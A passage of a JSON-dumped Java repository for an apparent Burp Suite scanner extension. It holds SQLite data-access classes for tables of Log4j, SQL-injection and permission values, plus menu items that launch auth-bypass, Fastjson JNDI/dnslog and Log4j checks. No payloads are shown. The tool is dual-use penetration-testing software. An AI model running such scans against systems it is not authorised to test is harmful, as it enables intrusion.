"content": "package burp.dao;\n\nimport burp.bean.Log4jBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class Log4jDao {\n // 获取多个\n public static List getLog4jListsByType(String type) {\n String sql = \"SELECT * FROM log4j WHERE type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet rs = null;\n List log4jBeans = new ArrayList<>();\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n rs = ps.executeQuery();\n while (rs.next()) {\n Log4jBean log4jBean = new Log4jBean();\n log4jBean.setId(rs.getInt(\"id\"));\n log4jBean.setType(rs.getString(\"type\"));\n log4jBean.setValue(rs.getString(\"value\"));\n log4jBeans.add(log4jBean);\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n return log4jBeans;\n }\n // 获取一个\n public static Log4jBean getLog4jListByType(String type) {\n String sql = \"SELECT * FROM log4j WHERE type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet rs = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n rs = ps.executeQuery();\n while (rs.next()) {\n Log4jBean log4jBean = new Log4jBean();\n log4jBean.setId(rs.getInt(\"id\"));\n log4jBean.setType(rs.getString(\"type\"));\n log4jBean.setValue(rs.getString(\"value\"));\n return log4jBean;\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n return null;\n }\n // 保存\n public static void saveLog4j(Log4jBean log4jBean) {\n String sql = \"INSERT INTO log4j(type, value) VALUES(?, ?)\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, log4jBean.getType());\n ps.setString(2, log4jBean.getValue());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n // 更新\n public static void updateLog4j(Log4jBean log4jBean) {\n String sql = \"UPDATE log4j SET value = ? WHERE type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, log4jBean.getValue());\n ps.setString(2, log4jBean.getType());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n // 删除\n public static void deleteLog4jByType(String type) {\n String sql = \"DELETE FROM log4j WHERE type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n\n}\n"
},
{
"path": "src/main/java/burp/dao/PermDao.java",
"content": "package burp.dao;\n\nimport burp.bean.PermBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\n/**\n * @Author Xm17\n * @Date 2024-06-22 10:48\n */\npublic class PermDao {\n // 保存\n public static void savePerm(PermBean permBean){\n String sql = \"INSERT OR REPLACE INTO perm (type, value) VALUES (?, ?)\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, permBean.getType());\n ps.setString(2, permBean.getValue());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n\n }\n // 更新\n public static void updatePerm(PermBean permBean){\n String sql = \"update perm set value = ? where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, permBean.getValue());\n ps.setString(2, permBean.getType());\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n // 删除\n public static void deletePerm(String type){\n String sql = \"delete from perm where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n\n }\n // 查询一个\n public static PermBean getPermListByType(String type) {\n PermBean permBean = new PermBean();\n String routesql = \"select * from perm where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet resultSet = null;\n try {\n ps = connection.prepareStatement(routesql);\n ps.setString(1, type);\n resultSet = ps.executeQuery();\n while (resultSet.next()) {\n permBean.setId(resultSet.getInt(\"id\"));\n permBean.setType(resultSet.getString(\"type\"));\n permBean.setValue(resultSet.getString(\"value\"));\n }\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n return permBean;\n\n }\n // 查询所有\n public static List getPermListsByType(String type){\n List permBeanLists = new ArrayList<>();\n String routesql = \"select * from perm where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet resultSet = null;\n try {\n ps = connection.prepareStatement(routesql);\n ps.setString(1, type);\n resultSet = ps.executeQuery();\n while (resultSet.next()) {\n PermBean permBean = new PermBean();\n permBean.setId(resultSet.getInt(\"id\"));\n permBean.setType(resultSet.getString(\"type\"));\n permBean.setValue(resultSet.getString(\"value\"));\n permBeanLists.add(permBean);\n }\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n return permBeanLists;\n }\n\n}\n"
},
{
"path": "src/main/java/burp/dao/RouteDao.java",
"content": "package burp.dao;\n\nimport burp.bean.RouteBean;\nimport burp.bean.SqlBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class RouteDao {\n // 获取所有规则\n public static List getRouteLists(){\n String sql = \"SELECT * FROM route\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet rs = null;\n List routeBeans = new ArrayList<>();\n try {\n ps = connection.prepareStatement(sql);\n rs = ps.executeQuery();\n while (rs.next()){\n RouteBean routeBean = new RouteBean();\n routeBean.setEnable(rs.getInt(\"enable\"));\n routeBean.setName(rs.getString(\"name\"));\n routeBean.setPath(rs.getString(\"path\"));\n routeBean.setExpress(rs.getString(\"express\"));\n routeBeans.add(routeBean);\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n return routeBeans;\n }\n // 通过id修改规则\n public static void updateRouteById(RouteBean routeBean){\n String sql = \"UPDATE route SET enable = ?, name = ?, path = ?, express = ? WHERE id = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setInt(1, routeBean.getEnable());\n ps.setString(2, routeBean.getName());\n ps.setString(3, routeBean.getPath());\n ps.setString(4, routeBean.getExpress());\n ps.setInt(5, routeBean.getId());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n // 通过id修改enable\n public static void updateRouteEnable(RouteBean routeBean){\n String sql = \"UPDATE route SET enable = ? WHERE name = ? and path = ? and express = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setInt(1, routeBean.getEnable());\n ps.setString(2, routeBean.getName());\n ps.setString(3, routeBean.getPath());\n ps.setString(4, routeBean.getExpress());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n\n }\n // 删除\n public static boolean deleteRoute(RouteBean routeBean){\n String sql = \"DELETE FROM route WHERE name = ? and path = ? and express = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, routeBean.getName());\n ps.setString(2, routeBean.getPath());\n ps.setString(3, routeBean.getExpress());\n ps.executeUpdate();\n return true;\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n return false;\n } finally {\n DbUtils.close(connection, ps, null);\n }\n\n }\n // 添加规则\n public static void addRoute(RouteBean routeBean){\n String sql = \"INSERT INTO route (enable, name, path, express) VALUES (?, ?, ?, ?)\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setInt(1, routeBean.getEnable());\n ps.setString(2, routeBean.getName());\n ps.setString(3, routeBean.getPath());\n ps.setString(4, routeBean.getExpress());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n}\n"
},
{
"path": "src/main/java/burp/dao/SimilarDomainConfigDao.java",
"content": "package burp.dao;\n\nimport burp.bean.*;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class SimilarDomainConfigDao {\n // 保存域名配置\n public static void saveDomainConfig(SimilarDomainConfigBean config) {\n String sql = \"INSERT INTO domain_configs (project_id, domain, create_time) VALUES (?, ?, datetime('now','localtime'))\";\n Connection connection = null;\n PreparedStatement ps = null;\n try {\n connection = DbUtils.getConnection();\n ps = connection.prepareStatement(sql);\n ps.setInt(1, config.getProjectId());\n ps.setString(2, config.getDomain());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n\n // 批量保存域名配置\n public static void saveDomainConfigs(int projectId, List domains) {\n Connection connection = null;\n PreparedStatement ps = null;\n try {\n connection = DbUtils.getConnection();\n connection.setAutoCommit(false);\n\n // 先删除旧的配置\n String deleteSql = \"DELETE FROM domain_configs WHERE project_id = ?\";\n ps = connection.prepareStatement(deleteSql);\n ps.setInt(1, projectId);\n ps.executeUpdate();\n\n // 插入新的配置\n String insertSql = \"INSERT INTO domain_configs (project_id, domain, create_time) VALUES (?, ?, datetime('now','localtime'))\";\n ps = connection.prepareStatement(insertSql);\n for (String domain : domains) {\n ps.setInt(1, projectId);\n ps.setString(2, domain.trim());\n ps.addBatch();\n }\n ps.executeBatch();\n connection.commit();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n try {\n if (connection != null) {\n connection.rollback();\n }\n } catch (SQLException ex) {\n Utils.stderr.println(ex.getMessage());\n }\n } finally {\n try {\n if (connection != null) {\n connection.setAutoCommit(true);\n }\n } catch (SQLException e) {\n Utils.stderr.println(e.getMessage());\n }\n DbUtils.close(connection, ps, null);\n }\n }\n\n // 获取项目的域名配置\n public static List getDomainConfigs(int projectId) {\n List domains = new ArrayList<>();\n String sql = \"SELECT domain FROM domain_configs WHERE project_id = ?\";\n Connection connection = null;\n PreparedStatement ps = null;\n ResultSet rs = null;\n try {\n connection = DbUtils.getConnection();\n ps = connection.prepareStatement(sql);\n ps.setInt(1, projectId);\n rs = ps.executeQuery();\n while (rs.next()) {\n domains.add(rs.getString(\"domain\"));\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n return domains;\n }\n}\n"
},
{
"path": "src/main/java/burp/dao/SimilarDomainResultDao.java",
"content": "package burp.dao;\n\nimport burp.bean.SimilarDomainResultBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class SimilarDomainResultDao {\n // 保存域名结果\n public static int saveDomainResult(SimilarDomainResultBean result) {\n Connection connection = null;\n PreparedStatement ps = null;\n ResultSet rs = null;\n\n try {\n connection = DbUtils.getConnection();\n\n // 先检查是否存在相同记录\n String checkSql = \"SELECT id FROM domain_results WHERE project_id = ? AND domain = ?\";\n ps = connection.prepareStatement(checkSql);\n ps.setInt(1, result.getProjectId());\n ps.setString(2, result.getDomain());\n rs = ps.executeQuery();\n\n if (rs.next()) {\n // 如果存在,更新IP和时间\n int existingId = rs.getInt(\"id\");\n DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet\n\n String updateSql = \"UPDATE domain_results SET ip = ?, create_time = datetime('now','localtime') WHERE id = ?\";\n ps = connection.prepareStatement(updateSql);\n ps.setString(1, result.getIp());\n ps.setInt(2, existingId);\n ps.executeUpdate();\n\n return existingId;\n } else {\n // 不存在则插入新记录\n DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet\n\n String insertSql = \"INSERT INTO domain_results (project_id, domain, ip, create_time) VALUES (?, ?, ?, datetime('now','localtime'))\";\n // 移除 Statement.RETURN_GENERATED_KEYS\n ps = connection.prepareStatement(insertSql);\n ps.setInt(1, result.getProjectId());\n ps.setString(2, result.getDomain());\n ps.setString(3, result.getIp());\n ps.executeUpdate();\n\n // 使用 last_insert_rowid() 获取最后插入的ID\n ps = connection.prepareStatement(\"SELECT last_insert_rowid()\");\n rs = ps.executeQuery();\n if (rs.next()) {\n return rs.getInt(1);\n }\n }\n\n return -1;\n } catch (SQLException e) {\n return -1;\n } catch (Exception e) {\n return -1;\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n }\n\n // 获取项目的域名结果\n public static List getDomainResults(int projectId) throws SQLException {\n List results = new ArrayList<>();\n String sql = \"SELECT id, project_id, domain, ip, create_time FROM domain_results WHERE project_id = ?\";\n\n Connection connection = null;\n PreparedStatement ps = null;\n ResultSet rs = null;\n\n try {\n connection = DbUtils.getConnection();\n ps = connection.prepareStatement(sql);\n ps.setInt(1, projectId);\n rs = ps.executeQuery();\n\n while (rs.next()) {\n SimilarDomainResultBean bean = new SimilarDomainResultBean(\n rs.getInt(\"project_id\"),\n rs.getString(\"domain\"),\n rs.getString(\"ip\")\n );\n bean.setId(rs.getInt(\"id\"));\n bean.setCreateTime(rs.getString(\"create_time\"));\n results.add(bean);\n }\n\n return results;\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n }\n\n public static boolean isDomainExists(int id, String domain) {\n String sql = \"SELECT id FROM domain_results WHERE id = ? AND domain = ?\";\n try {\n Connection connection = DbUtils.getConnection();\n PreparedStatement ps = connection.prepareStatement(sql);\n ps.setInt(1, id);\n ps.setString(2, domain);\n ResultSet rs = ps.executeQuery();\n if (rs.next()) {\n return true;\n }\n } catch (SQLException e) {\n e.printStackTrace();\n }\n return false;\n }\n\n public static void updateDomainResult(SimilarDomainResultBean result) {\n Connection connection = null;\n PreparedStatement ps = null;\n\n try {\n connection = DbUtils.getConnection();\n\n // 更新域名记录信息,包括IP和更新时间\n String sql = \"UPDATE similar_domain_results SET ip = ?, update_time = datetime('now','localtime') WHERE id = ?\";\n ps = connection.prepareStatement(sql);\n\n ps.setString(1, result.getIp());\n ps.setInt(2, result.getId());\n\n int updatedRows = ps.executeUpdate();\n\n if (updatedRows == 0) {\n Utils.stderr.println(\"更新域名结果失败: 记录不存在 (ID: \" + result.getId() + \")\");\n }\n\n } catch (Exception e) {\n Utils.stderr.println(\"更新域名结果失败: \" + e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n}"
},
{
"path": "src/main/java/burp/dao/SimilarProjectDao.java",
"content": "package burp.dao;\n\nimport burp.bean.*;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class SimilarProjectDao {\n // 保存项目\n public static void saveProject(SimilarProjectBean project) {\n String sql = \"INSERT INTO projects (name, create_time) VALUES (?, datetime('now','localtime'))\";\n Connection connection = null;\n PreparedStatement ps = null;\n try {\n connection = DbUtils.getConnection();\n ps = connection.prepareStatement(sql);\n ps.setString(1, project.getName());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n\n // 获取所有项目\n public static List getAllProjects() {\n List projects = new ArrayList<>();\n String sql = \"SELECT * FROM projects ORDER BY create_time DESC\";\n Connection connection = null;\n PreparedStatement ps = null;\n ResultSet rs = null;\n try {\n connection = DbUtils.getConnection();\n ps = connection.prepareStatement(sql);\n rs = ps.executeQuery();\n while (rs.next()) {\n SimilarProjectBean project = new SimilarProjectBean();\n project.setId(rs.getInt(\"id\"));\n project.setName(rs.getString(\"name\"));\n project.setCreateTime(rs.getString(\"create_time\"));\n projects.add(project);\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n return projects;\n }\n\n // 删除项目\n public static void deleteProject(int projectId) {\n String sql = \"DELETE FROM projects WHERE id = ?\";\n Connection connection = null;\n PreparedStatement ps = null;\n try {\n connection = DbUtils.getConnection();\n ps = connection.prepareStatement(sql);\n ps.setInt(1, projectId);\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n}\n"
},
{
"path": "src/main/java/burp/dao/SimilarUrlResultDao.java",
"content": "package burp.dao;\n\n\nimport burp.bean.SimilarUrlResultBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.Statement;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class SimilarUrlResultDao {\n // 保存URL结果\n public static int saveUrlResult(SimilarUrlResultBean result) {\n Connection connection = null;\n PreparedStatement ps = null;\n ResultSet rs = null;\n\n try {\n connection = DbUtils.getConnection();\n\n // 先检查是否存在相同记录\n String checkSql = \"SELECT id FROM url_results WHERE project_id = ? AND url = ?\";\n ps = connection.prepareStatement(checkSql);\n ps.setInt(1, result.getProjectId());\n ps.setString(2, result.getUrl());\n rs = ps.executeQuery();\n\n if (rs.next()) {\n // 如果存在,更新时间\n int existingId = rs.getInt(\"id\");\n DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet\n\n String updateSql = \"UPDATE url_results SET create_time = datetime('now','localtime') WHERE id = ?\";\n ps = connection.prepareStatement(updateSql);\n ps.setInt(1, existingId);\n ps.executeUpdate();\n\n return existingId;\n } else {\n // 不存在则插入新记录\n DbUtils.close(null, ps, rs); // 关闭旧的PreparedStatement和ResultSet\n\n String insertSql = \"INSERT INTO url_results (project_id, url, create_time) VALUES (?, ?, datetime('now','localtime'))\";\n ps = connection.prepareStatement(insertSql, Statement.RETURN_GENERATED_KEYS);\n ps.setInt(1, result.getProjectId());\n ps.setString(2, result.getUrl());\n ps.executeUpdate();\n\n // 获取新插入记录的ID\n rs = ps.getGeneratedKeys();\n if (rs.next()) {\n return rs.getInt(1);\n }\n }\n\n return -1;\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n return -1;\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n }\n\n // 获取项目的URL结果\n public static List getUrlResults(int projectId) {\n Connection connection = null;\n PreparedStatement ps = null;\n ResultSet rs = null;\n List results = new ArrayList<>();\n\n try {\n connection = DbUtils.getConnection();\n\n // 按创建时间降序排列,获取最新的记录\n String sql = \"SELECT id, project_id, url, create_time FROM url_results WHERE project_id = ? ORDER BY create_time DESC\";\n ps = connection.prepareStatement(sql);\n ps.setInt(1, projectId);\n rs = ps.executeQuery();\n\n while (rs.next()) {\n SimilarUrlResultBean result = new SimilarUrlResultBean();\n result.setId(rs.getInt(\"id\"));\n result.setProjectId(rs.getInt(\"project_id\"));\n result.setUrl(rs.getString(\"url\"));\n result.setCreateTime(rs.getString(\"create_time\"));\n results.add(result);\n }\n\n return results;\n } catch (Exception e) {\n Utils.stderr.println(\"获取URL结果失败: \" + e.getMessage());\n return null;\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n }\n\n // 检查URL是否存在\n public static boolean isUrlExists(int projectId, String url) {\n Connection connection = null;\n PreparedStatement ps = null;\n ResultSet rs = null;\n\n try {\n connection = DbUtils.getConnection();\n\n // 查询是否存在相同URL记录\n String sql = \"SELECT COUNT(*) as count FROM url_results WHERE project_id = ? AND url = ?\";\n ps = connection.prepareStatement(sql);\n ps.setInt(1, projectId);\n ps.setString(2, url);\n rs = ps.executeQuery();\n\n if (rs.next()) {\n return rs.getInt(\"count\") > 0;\n }\n\n return false;\n } catch (Exception e) {\n Utils.stderr.println(\"检查URL是否存在失败: \" + e.getMessage());\n return false;\n } finally {\n DbUtils.close(connection, ps, rs);\n }\n }\n}\n"
},
{
"path": "src/main/java/burp/dao/SqlDao.java",
"content": "package burp.dao;\n\nimport burp.bean.SqlBean;\nimport burp.utils.DbUtils;\nimport burp.utils.Utils;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic class SqlDao {\n\n // 保存\n public static void saveSql(SqlBean sqlBean){\n String sql = \"INSERT OR REPLACE INTO sqli (type, value) VALUES (?, ?)\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, sqlBean.getType());\n ps.setString(2, sqlBean.getValue());\n ps.executeUpdate();\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n // 更新\n public static void updateSql(SqlBean sqlBean){\n String sql = \"update sqli set value = ? where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, sqlBean.getValue());\n ps.setString(2, sqlBean.getType());\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n\n // 根据type获取多个\n public static List getSqlListsByType(String type){\n List sqlLists = new ArrayList<>();\n String routesql = \"select * from sqli where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet resultSet = null;\n try {\n ps = connection.prepareStatement(routesql);\n ps.setString(1, type);\n resultSet = ps.executeQuery();\n while (resultSet.next()) {\n SqlBean sqlBean = new SqlBean();\n sqlBean.setId(resultSet.getInt(\"id\"));\n sqlBean.setType(resultSet.getString(\"type\"));\n sqlBean.setValue(resultSet.getString(\"value\"));\n sqlLists.add(sqlBean);\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, resultSet);\n }\n return sqlLists;\n }\n // 根据type获取一个\n public static SqlBean getSqlListByType(String type){\n String routesql = \"select * from sqli where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n ResultSet resultSet = null;\n try {\n ps = connection.prepareStatement(routesql);\n ps.setString(1, type);\n resultSet = ps.executeQuery();\n while (resultSet.next()) {\n SqlBean sqlBean = new SqlBean();\n sqlBean.setId(resultSet.getInt(\"id\"));\n sqlBean.setType(resultSet.getString(\"type\"));\n sqlBean.setValue(resultSet.getString(\"value\"));\n return sqlBean;\n }\n } catch (Exception e) {\n Utils.stderr.println(e.getMessage());\n } finally {\n DbUtils.close(connection, ps, resultSet);\n }\n return null;\n }\n\n\n // 根据type删除\n public static void deleteSqlByType(String type){\n String sql = \"delete from sqli where type = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n } finally {\n DbUtils.close(connection, ps, null);\n }\n }\n // 根据type和value删除\n public static void deleteSqlByTypeAndValue(String type, String value){\n String sql = \"delete from sqli where type = ? and value = ?\";\n Connection connection = null;\n try {\n connection = DbUtils.getConnection();\n } catch (SQLException e) {\n throw new RuntimeException(e);\n }\n PreparedStatement ps = null;\n try {\n ps = connection.prepareStatement(sql);\n ps.setString(1, type);\n ps.setString(2, value);\n ps.executeUpdate();\n } catch (Exception e) {\n e.printStackTrace();\n }\n\n }\n\n}\n"
},
{
"path": "src/main/java/burp/menu/AuthMenu.java",
"content": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.AuthUI;\n\nimport javax.swing.*;\nimport java.awt.event.ActionListener;\n\npublic class AuthMenu extends JMenuItem {\n public AuthMenu(IHttpRequestResponse[] requestResponses) {\n this.setText(\"^_^ AuthBypass Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n AuthUI.Check(requestResponses);\n }\n });\n thread.start();\n\n }\n });\n }\n}\n"
},
{
"path": "src/main/java/burp/menu/FastjsonMenu.java",
"content": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.FastjsonUI;\n\nimport javax.swing.*;\nimport java.awt.event.ActionListener;\n\npublic class FastjsonMenu extends JMenuItem {\n public JMenuItem FastjsonDnslogMenu(IHttpRequestResponse[] responses) {\n this.setText(\"^_^ FastJson Dnslog Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n new FastjsonUI().CheckDnslog(responses);\n }\n });\n thread.start();\n\n }\n });\n return this;\n }\n\n public JMenuItem FastjsonEchoMenu(IHttpRequestResponse[] responses) {\n this.setText(\"^_^ FastJson Echo Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n new FastjsonUI().CheckEchoVul(responses);\n }\n });\n thread.start();\n\n }\n });\n return this;\n }\n\n public JMenuItem FastjsonJNDIMenu(IHttpRequestResponse[] responses) {\n this.setText(\"^_^ FastJson JNDI Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n new FastjsonUI().CheckJNDIVul(responses);\n }\n });\n thread.start();\n\n }\n });\n return this;\n }\n\n public JMenuItem FastjsonVersionMenu(IHttpRequestResponse[] responses) {\n this.setText(\"^_^ FastJson Version Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n new FastjsonUI().CheckVersion(responses);\n }\n });\n thread.start();\n\n }\n });\n return this;\n }\n}\n"
},
{
"path": "src/main/java/burp/menu/Log4jMenu.java",
"content": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.Log4jUI;\n\nimport javax.swing.*;\nimport java.awt.event.ActionListener;\n\npublic class Log4jMenu extends JMenuItem {\n public Log4jMenu(IHttpRequestResponse[] requestResponses) {\n this.setText(\"^_^ Log4j Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n Log4jUI.Check(requestResponses,true);\n }\n });\n thread.start();\n\n }\n });\n }\n}\n"
},
{
"path": "src/main/java/burp/menu/NucleiMenu.java",
